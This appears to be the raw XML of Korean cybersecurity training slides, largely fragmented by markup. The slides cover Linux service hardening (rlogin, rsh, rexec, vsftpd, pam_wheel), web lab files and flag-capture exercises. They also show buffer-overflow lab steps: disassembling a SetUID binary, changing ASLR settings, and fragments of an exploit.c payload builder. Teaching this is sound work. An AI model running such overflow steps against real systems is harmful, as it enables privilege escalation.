                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> 303  8</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>23  2017 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>xss.php</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>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example]# ls -a</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>.  ..  index.html  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>sqlin.php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>xss.php</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example]# ls -al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20</a:t>
              </a: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4096  8</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23  2017 .</a:t>
              </a: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7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4096  3</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27  2018 ..</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>rwxrw-rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>- 1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303  7</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3  2017 index.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>-r--r-- 1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439  7</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3  2017 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>sqlin.php</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>rwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>--r-- 1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303  8</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23  2017 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>xss.php</a:t>
              </a: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982B7F67-ED70-4529-B941-47D2551C8E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69630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/Theory/T2/4</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/var/www/html/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>webhack</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/example</a:t>
              </a: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59306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3891362623"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4451847" y="2813240"/>
          <a:ext cx="3288306" cy="2706182"/>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dirty="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7">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수업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741237"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="21107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38503"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="175895">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348838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="140716">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34361"/>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6153746"/>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51988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2296790"/>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9907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System</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Network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Web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Malware</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1156625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488788984"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4451847" y="2813240"/>
          <a:ext cx="3288306" cy="147789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6"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백도어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Metasploit,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7521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898029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3122722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dirty="0"/>
              <a:t>(test) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> test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1288673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dirty="0"/>
              <a:t># grep root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dirty="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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3788196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1902467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xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/rlogin</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disable = no”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disable = yes”</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rsh</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disable = no”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disable = yes”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 변경 후 저장</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>비활성화</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disable = no”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disable = yes”</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cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/rlogin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rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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rexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | grep disable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 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>hosts.equiv</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hosts.equiv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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2980842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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>hosts.equiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>hosts.equiv</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>hosts.equiv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etc/hosts.equiv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rhost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키코드 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3315204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user_list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3395979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내용 개체 틀 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D7B7A31-846B-4771-92F1-9A2CB8A96276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>고려대학교 사이버국방학과 졸업</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>전문사관 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>기</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>고려대학교 정보보호대학원</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>석사과정 재학</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4012923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–w packet.txt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-r packet.txt | more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dirty="0"/>
              <a:t>: qwer1031)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vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>user_list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vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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user_list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user_list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(white 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키코드 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="696027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/var/log/secure</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385792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dirty="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(Pluggable Authentication Modules)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pam_wheel.so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pam_wheel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(wheel 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키코드 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1012789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199904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020956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3048882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11750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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" dirty="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-M intel -d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3047402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/sec/bof64.c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dirty="0"/>
              <a:t>권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">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/sec/bof64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463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사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disassemble</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -M intel -d bof64 | more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144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2078391087"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4451847" y="2813240"/>
          <a:ext cx="3288306" cy="1476757"/>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VM player</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>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VM </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>다운로드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801342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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(little endian)</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dirty="0" err="1"/>
              <a:t>리다이렉션으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="589701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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" dirty="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kernel.randomize_va_space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127721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/sec/bof64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SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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/sec/bof64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ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>활성화</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># sysctl –w kernel.randomize_va_space=2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787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위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 변경</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> test </a:t>
            </a:r>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/sec/bof64 $(python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dirty="0"/>
              <a:t>$ exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2)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2282157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만드는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exploit.c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-M intel -d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5.11, 32-bit)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15674141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/sec/stack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사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disassemble</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -M intel -d stack | more</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8688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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>exploit.c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exploit.c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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>exploit.c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-o exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>exploit.c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/sec/exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 이용한 페이로드 제작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./exploit 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맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>memset</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> (&amp; buffer,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dirty="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주소는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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(buffer + off)) = (long) (buffer +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8240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/sec/stack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memcpy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
